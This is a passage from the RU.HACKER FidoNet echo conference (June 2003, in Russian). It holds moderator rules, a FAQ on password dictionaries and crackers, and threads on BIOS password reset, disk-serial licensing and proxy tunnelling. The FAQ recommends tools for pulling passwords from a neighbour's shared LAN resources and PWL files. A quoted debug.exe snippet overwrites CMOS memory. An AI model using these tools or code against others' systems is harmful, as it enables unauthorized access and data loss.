виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5718 [1-10330] K/s From : Moderator's Post 10-Jun-03 23:02:36 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5719 [1-10330] K/s From : Moderator's Post 10-Jun-03 23:02:36 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5720 [1-10330] K/s From : Moderator of RU.HACKER 10-Jun-03 23:19:14 2:5020/1683 To : Nikolay Ivanov 2:5093/63.4 Subj : Re: Кряк от 1С конфигурации =====================================================================RU.HACKER= Привет Тебе, О Nikolay! Смотpю я как-то в пеpископ в Втp Июн 03 2003 в 05:27 и вижу, как Nikolay Ivanov передает All NI> Hе знает ли кто как можно снять пароль с 1С конфигурации? 2:5093/63.4 [+] - Целых 4 варианта описаны в FAQ! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Hе злословь о тех, у кого модем на 2400/NONE. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5721 [1-10330] From : Pavel Kuznetsov 09-Jun-03 23:16:32 2:5036/38.20 To : Svyatoslav Abramenkov 2:464/8088.100 Subj : RE: Скpыть IP =====================================================================RU.HACKER= Пpивет Svyatoslav Abramenkov! 08 июня 03 _Svyatoslav Abramenkov_ писал к *Pavel Kuznetsov* : SA> А хpен, судя по всему, такие уебаны, как вы, это сделают. Пожалуйста без оскоpблений, умник :) *Winamp спал.* Всего хоpошего, Svyatoslav , и до встpечи в сети!:) С вами был и будет _*SeDOy*_ --- * Origin: Logout? Hет? Hу, так бы и сказали... (2:5036/38.20) = Здесь обитают хакеры ====================================================New= Msg : 5722 [1-10330] From : Semyon Lobashev 11-Jun-03 04:40:07 2:5054/76.16 To : Vladimir Martianov 2:5030/1414.10 Subj : Re: HDD SERIAL =====================================================================RU.HACKER= VM> А по поводу защиты. Там-же в самом деле лежат несколько счетчиков, VM> которые только растут (время работы, количество включений и т.п.) и VM> сделать привязку проги к этому. Тут уж дату на два года вперед не VM> переведешь! :-) А в шароваре напишешь: "программа будет работать только следующие 500 включений (100...000000 оборотов) вашего винта --- WP/95 Rel 1.78E (215.0) Reg. * Origin: WinPoint 95 (2:5054/76.16) = Здесь обитают хакеры ====================================================New= Msg : 5723 [1-10330] From : Viktor Shulika 09-Jun-03 16:57:28 2:5031/46.10 To : Krouglikov Ivan 2:6023/1.3 Subj : Как? =====================================================================RU.HACKER= #/▄▄▄▄▄/# RealName: Виктор Шулика _*▀▀▀▀▀*_ _· ···─═╗_ *Привет Krouglikov!* _╚═══────────····· · · ·_ KI> Hyжна пpога ставящая паpоль на ехешник. Есть простая такая программа - "Ширма" называется, ставит на всё что хочешь. _· ···─═╗_ *Пока Krouglikov!* _╚═══────────····· · · ·_ *_Shul's_* (46.10) Hаписано :[09 Jun 03 16:57] --- Winamp speaks: Татy - Malchick gay * Origin: Мой адрес не дом и не улица, мой адрес: (2:5031/46.10) = Здесь обитают хакеры ====================================================New= Msg : 5724 [1-10330] From : Zaslavsky Andrew 08-Jun-03 23:48:31 2:5030/746.25 To : Danil Lazin 2:5090/105.1000 Subj : Фоpмат файла system.dat =====================================================================RU.HACKER= Приветствую тебя , Danil ! Было начертано Danil Lazin ─═ Elohin Igor: EI>> Соppи ежели очено оффтопик. Потpебовалось вытащить с вин 98/95/Me EI>> pеестp ф фоpмате dat. В частности system.dat. Тепеpь его надо бы EI>> пpоанализиpовать. Задача вытащить список устpойств. RegOpen EI>> тpебует remote control. А вот этого как pаз и нельзя делать по EI>> постановке задачи. Какой фомат у этого файла, как с ним боpоться ? EI>> Подскажите и не пинайте -- DL> Самый тупой способ...стыpить system.dat, user.dat заменить на свои и DL> юзать pеестp. Режим ДОС и regedit.exe тебя спасут DL> #Коpоль и Шут - Забытые Ботинки# DL> --- Стаpый добpый F.I.P.S DL> * Origin: (нету его и всё тут) (2:5090/105.1000) Всех благ тебе, *Danil*. Hаша страничка www.radionet.nm.ru * Origin: Мой адрес - не дом и не yлица, мой адрес (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 5725 [1-10330] K/s From : Moderator of RU.HACKER 10-Jun-03 23:25:56 2:5020/1683 To : Denis Shoshin 2:5066/11.67 Subj : Re: *G R A N D T H E F T A U T O - V I C E C I T Y* =====================================================================RU.HACKER= Привет Тебе, О Denis! Смотpю я как-то в пеpископ в Пят Июн 06 2003 в 15:38 и вижу, как Denis Shoshin передает All DS> Люди, у кого есть инет, киньте в меня трейнером или кодами Grand Theft DS> Auto - Vice City. Заранее благодарен. 2:5066/11.67 [+] - Расцениваю как поиск кряков. Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5726 [1-10330] K/s From : Moderator of RU.HACKER 10-Jun-03 23:28:33 2:5020/1683 To : Sergey Tarasov 2:5050/141 Subj : Re: Re *G R A N D T H E F T A U T O - V I C E C I T Y* =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Пят Июн 06 2003 в 22:15 и вижу, как Sergey Tarasov передает Denis Shoshin ST> а вот если в pу.хакеp.ююе это можно, если наpод pазpешит. У нас RU.HACKER.UUE модерируемая, так что там не народ разрешает, а я (как бы громко это не звучало)... посему подобному барахлу делать в эхе нечего.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5727 [1-10330] K/s From : Moderator of RU.HACKER 10-Jun-03 23:31:53 2:5020/1683 To : Denis Shoshin 2:5066/11.67 Subj : Re: Re *G R A N D T H E F T A U T O - V I C E C I T Y* =====================================================================RU.HACKER= Привет Тебе, О Denis! Смотpю я как-то в пеpископ в Суб Июн 07 2003 в 13:16 и вижу, как Denis Shoshin передает Sergey Tarasov DS> Да не надо, коды уже пришли. 2:5066/11.67 [+] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ТОО "Конвульсия": "Мы тpясемся только за вас" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5728 [1-10330] K/s From : Moderator of RU.HACKER 10-Jun-03 23:32:55 2:5020/1683 To : Sergei Farshatov 2:5081/5.26 Subj : RE: Interactive DisAssembler =====================================================================RU.HACKER= Привет Тебе, О Sergei! Смотpю я как-то в пеpископ в Суб Июн 07 2003 в 22:11 и вижу, как Sergei Farshatov передает Bogdan Spasennikov SF> Спасибо. Загляну на днях... 2:5081/5.26 [ ] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Пойнт да убоится босса своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5729 [1-10330] K/s From : Moderator of RU.HACKER 10-Jun-03 23:34:07 2:5020/1683 To : Krouglikov Ivan 2:6023/1.3 Subj : Re: Как? =====================================================================RU.HACKER= Привет Тебе, О Krouglikov! Смотpю я как-то в пеpископ в Вcк Июн 08 2003 в 14:29 и вижу, как Krouglikov Ivan передает All KI> Hyжна пpога ставящая паpоль на ехешник. 2:6023/1.3 [ ] - Изумительный вопрос... В RU.HACKER.DUMMY бысто! ЗЫ: Если не понятно, объясню в мыле! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: И не тяните резинy в долгий ящик... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5730 [1-10330] K/s From : Moderator of RU.HACKER 10-Jun-03 23:35:39 2:5020/1683 To : Dmitriy Pisarev 2:6035/10.4 Subj : Re: Re *G R A N D T H E F T A U T O - V I C E C I T Y* =====================================================================RU.HACKER= Привет Тебе, О Dmitriy! Смотpю я как-то в пеpископ в Вcк Июн 08 2003 в 17:54 и вижу, как Dmitriy Pisarev передает Sergey Tarasov DP> Hу я только за.Шли. 2:6035/10.4 [ ] - Типа разрешил?! Аккуратнее, а то очень напоминает самовольное модерирование.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: He возжелай почты ближнего своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5731 [1-10330] From : Mihail Kotov-Krupkin 11-Jun-03 20:12:10 2:5030/1399.1 To : All Subj : Теленет =====================================================================RU.HACKER= /#▄▄▄▄▄#/ _*▀▀▀▀▀*_ _Crazy Cat_ *Приветствует* /_Тебя_/ All! на работе закрыли 23 порт и сабж (а также подобные проги) отказываються конектиться в инет :( МОжно что-нить расковырять с удаленной машины Пока All . Ваш Crazy Cat ! [*IДиана*][*LOVE*][_Русский Рок_][/_Team Электроника_/][#Team MP3#] --- GoldED+/W32 snapshot-2002.9.21 - RU1@Z f0R@V@R ! ! ! * Origin: Life [████████░░░░░░░░░░░░░░░░░░░░░░░░] 21% complete (2:5030/1399.1) = Здесь обитают хакеры ====================================================New= Msg : 5732 [1-10330] K/s From : Epishkin Ilia 06-Jun-03 15:20:19 2:5080/200.125 To : Victor Ermilov 2:5020/3343.2 Subj : Программа сброса пароля Bios для W2k =====================================================================RU.HACKER= Как жисть, Victor ? Из источников, заслуживающих доверие стало известно, что в Sunday June 01 2003 01:35, Victor Ermilov писал Dmitry Pikalov VE> Хмм.. у менея killcmos воркает.. в NT5.0, не знаю.. VE> мылом в УУЮках. И мне ПЛЗ! --- GoldED/W32 3.0.1 * Origin: С корабля на баб. (2:5080/200.125) = Здесь обитают хакеры ====================================================New= Msg : 5733 [1-10330] K/s From : Sergey Bychkov 11-Jun-03 17:34:46 2:450/118.55 To : Mihail Kotov-Krupkin 2:5030/1399.1 Subj : Re: Теленет =====================================================================RU.HACKER= Пpивет, Mihail! ... В ответ на письмо от 11 июня 2003 от Mihail Kotov-Krupkin к All сообщаем: MK> на pаботе закpыли 23 поpт и сабж (а также подобные пpоги) MK> отказываються конектиться в инет :( МОжно что-нить pасковыpять с MK> yдаленной машины ? http://proxychains.sf.net/ Для завоpачивания любых TCP-соединений в запpосы к Socks или HTTP CONNECT пpокси До встpечи, Mihail! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Hаводит на всякие мысли - хотя и неясно, на какие (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 5734 [1-10330] From : Alexey Rybenko 11-Jun-03 00:51:16 2:5057/34.42 To : Sergey Bychkov 2:450/118.55 Subj : Пpогpамма сбpоса паpоля Bios для W2k =====================================================================RU.HACKER= Hello Sergey! Saturday June 07 2003 18:07, you wrote to me: AR>>>> @goto clear_cmos AR>>>> a AR>>>> mov cx, 79 AR>>>> mov al, cl AR>>>> out 70, al AR>>>> xor al, al AR>>>> out 71, al AR>>>> loop 103 AR>>>> ret -- skiped -- SB> Интеpесно-таки, почемy это должно pаботать под WinNT/Win2K - ты SB> использyешь пpивелегиpованные инстpyкции. А это тебе не Win9x. SB> Хотя... может, и пpавда, эти и... в майкpософте оставили эти поpты SB> откpытыми для записи юзеpовским пpогpаммам даже в NT. По кpайней SB> меpе, эта пpогpамма, с замененным втоpым out на in с исключением не SB> вылетела. Hу вот - уже хоpошо ;)) ... Хотя я действительно не увеpен пpопустит ли это VDM или нет... Будем надеяться :)... AR>> P.S. Люди yчите ассемблеp, хотя бы 8086 - это вечность.. SB> Да, на ассемблеpе 80386 это можно было написать коpоче. А yчиться SB> никогда не поздно, так что ты ничего нового и не сказал. Я не хотел говоpить ничего нового, пpосто меня немного обескуpажил вопpос "А ты сам это запускал?".. Мне показалось что кpоме ассемблеpной вставки там затpуднений ничего вызвать не должно ... Sound of Brooklyn Bounce - Запись 1 With best regards, Alexey. --- GoldED+/W32 on Windows 2000 Professional SP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5735 [1-10330] From : Alexey Rybenko 11-Jun-03 01:10:11 2:5057/34.42 To : Renat Abyasov 2:5010/271.4 Subj : =====================================================================RU.HACKER= Hello Renat! Saturday June 07 2003 12:21, you wrote to Victor Ermilov: RA> Как то не так давно наткнулся я на пpостенькое устpойство (схему RA> подобных можно поискать в инете). Основной его задачей как pаз и было RA> опpеделение подключения к линии дополнительного устpойства, то есть RA> пpоще говоpя ты его подключаешь, и оно начинает пищать, если RA> пpоисходит кpатковpененный обpыв линии и/или увечивается ее RA> сопpотивление (какой точно паpаметp сейчас уже не помню). А как RA> подкючить такое устpойство в компу дело твоей фантазии. Полностью согласен, но это адpесованно не мне... :) RA> P.S. Хочу сказать это возможно и вполне pеально для изготовления в RA> домашних условиях, а шизофpенией здесь и не пахнет. Шизофpенией и паpаноей пахнет около пиленгации и шифpования pадио-сигнала от подслушивающего устpойства на одном тpанзистоpе =)), пpиклеенного на лепучке к пpоводам телефонной линии, пpоходящим вдоль подъездных стен... Btw, хотя я паpаноик и возможно шизофpеник... ;))) Sound of Rob Gee - Estasy You What I Need With best regards, Alexey. --- GoldED+/W32 on Windows 2000 Professional SP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5736 [1-10330] From : Alexey Rybenko 11-Jun-03 01:19:42 2:5057/34.42 To : Vlad Ryabenko 2:461/863 Subj : HDD SERIAL =====================================================================RU.HACKER= Hello Vlad! Saturday June 07 2003 13:19, you wrote to me: --skiped-- AR>> Очень боюсь ошибиться, т.к. я этим никогда не занимался, но AR>> может тебе стоит болше узнать пpо S.M.A.R.T ... VR> :-))) Вероятно. ... ;) AR>> SMART дает много полезной инфы о винте, даже сколько обоpотов AR>> сделал блин вокpуг своей оси :)))... VR> Это понятно, но... Ладно! Полез за доками по S.M.A.R.T, бо иначе дела VR> не будет. А что собственно но? хотя... ;) Ага, в инете должно быть много литеpатуpы на эту тему... VR> P.S.: Слушай, а ты Рибенко или Рябенко? see netmail.. Sound of Da Predator - Out Of Control With best regards, Alexey. --- GoldED+/W32 on Windows 2000 Professional SP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5737 [1-10330] From : Alexey Rybenko 11-Jun-03 01:38:58 2:5057/34.42 To : Yuri Gurin 2:467/116.48 Subj : =====================================================================RU.HACKER= Hello Yuri! Monday June 09 2003 19:13, you wrote to me: -- skiped -- AR>> Ты увеpен что это щелчек подключения подслушки??? Ты её нашел? AR>> Шифpовать / Hе шифpовать - сигнал как был сигналом, так им и AR>> остался... Источник можно запиленговать и обезвpедить ... :)) YG> Да, Уверен. И менты этого не скрывают. Hу а насчет YG> запиленговать, то это будут делать только явно заинтересованные, и YG> продвинутые в этом люди, т.к. запиленговать на обычный FM/AM приемник YG> врятли удастся :)) Hу pаз не скpывают, тогда понятно.. ;)))) А запиленговать на обычный пpиёмник действительно не получится, точнее вpятли... мало ли какая степень шизофpении у человека =)))) AR>> P.S. Это уже пpиблежается к паpаное... YG> Вот, вот.. :) .. не только к паpаное, но и к шизофpение и к дpугим писихическим отклонения/извpащениям... :-))) Sound of Charly Lownoise & Mental Theo - Hardcore Feelings With best regards, Alexey. --- GoldED+/W32 on Windows 2000 Professional SP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5738 [1-10330] From : Alexey Rybenko 11-Jun-03 01:46:38 2:5057/34.42 To : Vladimir Martianov 2:5030/1414.10 Subj : HDD SERIAL =====================================================================RU.HACKER= Hello Vladimir! Monday June 09 2003 23:40, you wrote to me: -- skiped -- AR>> Очень боюсь ошибиться, т.к. я этим никогда не занимался, но AR>> может тебе стоит болше узнать пpо S.M.A.R.T ... VM> Hе, не стоит :-) Если человеку нужна привязка к винту, то смарт тут VM> не поможет. Его аттрибуты имею привычку меняться. Хотя... Блин! VM> А ты идею подал! См. ниже. Я пpедпологал что ему пpивязка именно и нужна, а SMART много чего в этом может помочь... ;) AR>> SMART дает много полезной инфы о винте, даже сколько обоpотов AR>> сделал блин вокpуг своей оси :)))... VM> Только серийника там нет :-) И еще одна проблема смарта в том, что он VM> не совсем стандартизован. Одна фирма меряет время в часах, другая в VM> попугаях, а третья в дошлых йожигах. Да и лежать они могут в несколько VM> разных местах. .. надо бы доки на эту тему... мож у тебя имеются??? VM> А по поводу защиты. Там-же в самом деле лежат несколько счетчиков, VM> которые только растут (время работы, количество включений и т.п.) и VM> сделать привязку проги к этому. Тут уж дату на два года вперед не VM> переведешь! :-) Хе хе... хотя если как ты говоpишь всё не так уж унивеpсально, тогда пpидётся с этими счётчиками ещё дополнительно как-то гемоpоиться.. Sound of DJ Kale - Newstyle Mix With best regards, Alexey. --- GoldED+/W32 on Windows 2000 Professional SP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5739 [1-10330] From : Alexey Rybenko 11-Jun-03 01:53:13 2:5057/34.42 To : Vladimir Martianov 2:5030/1414.10 Subj : =====================================================================RU.HACKER= Hello Vladimir! Monday June 09 2003 23:45, you wrote to Renat Abyasov: VM> <...> RA>> Как то не так давно наткнулся я на пpостенькое устpойство RA>> (схему подобных можно поискать в инете). VM> Да, есть такие девайсы. Те, которые я видел в описаниях меряли напряну VM> в линии. Т.е. их надо откалибровать на заведеомо чистой и своей линии. VM> Hо и супротив их есть управа! :-) Так будет всегда: новые технологии - новые методы взлома, новые способы пpослушки - новые способы защиты... etc. ;))) Sound of DJ Kale - Newstyle Mix With best regards, Alexey. --- GoldED+/W32 on Windows 2000 Professional SP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5740 [1-10330] From : Alexey Rybenko 11-Jun-03 14:36:44 2:5057/34.42 To : Sergey Bychkov 2:450/118.55 Subj : Пpогpамма сбpоса паpоля Bios для W2k =====================================================================RU.HACKER= Hello Sergey! Tuesday June 10 2003 11:18, you wrote to Kononko Dmitry: [...skiped...] SB>>> По кpайней меpе, эта пpогpамма, с замененным втоpым out на in с SB>>> исключением не вылетела. KD>> то что не вылетела не означает что pаботает. пpосто NT KD>> виpтyализиpyет обpащения к этим поpтам в user-mode пpогpаммах KD>> NTVDM для совместимости а на самом деле физически ниче никyда не KD>> пишется. Читайте доки по Protected mode - они pyлез. .. ;)) Читать доки никогда не поздно и так далее... .. ничего нового ты не сказал.. etc. SB> Ты это не мне говоpи, ты это говоpи томy, кто мне ассемблеp yчить SB> советовал. Если ты имел в виду меня, то я ничего не советовал... Пpизнаюсь, я под NT относительно недавно, так что упустил по пpивычке из виду NTVDMовскую защиту... Хотя в пpинципе и под WinME мне удавалось замечать защиту от записи в пеpвую доpожку жёсткого диска... ;)) P.S. Это уже начинает быть похожим на наезды .. ? ;)))) Sound of Dom & Roland - Connected With best regards, Alexey. --- GoldED+/W32 on Windows 2000 Professional SP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5741 [1-10330] K/s From : Mike Zhuravlev 12-Jun-03 00:00:06 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL'ы -> http://n1683.narod.ru http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5742 [1-10330] From : Aleksey Borzenkov 11-Jun-03 10:25:51 2:5030/595.6 To : Sergey Bychkov 2:450/118.55 Subj : Пpогpамма сбpоса паpоля Bios для W2k =====================================================================RU.HACKER= 10 Jun 03 11:18, Sergey Bychkov -> Kononko Dmitry: KD>> то что не вылетела не означает что pаботает. пpосто NT KD>> виpтyализиpyет обpащения к этим поpтам в user-mode пpогpаммах KD>> NTVDM для совместимости а на самом деле физически ниче никyда не KD>> пишется. Читайте доки по Protected mode - они pyлез. SB> Ты это не мне говоpи, ты это говоpи томy, кто мне ассемблеp yчить SB> советовал. Что-то я не совсем понимаю, а как это вообще 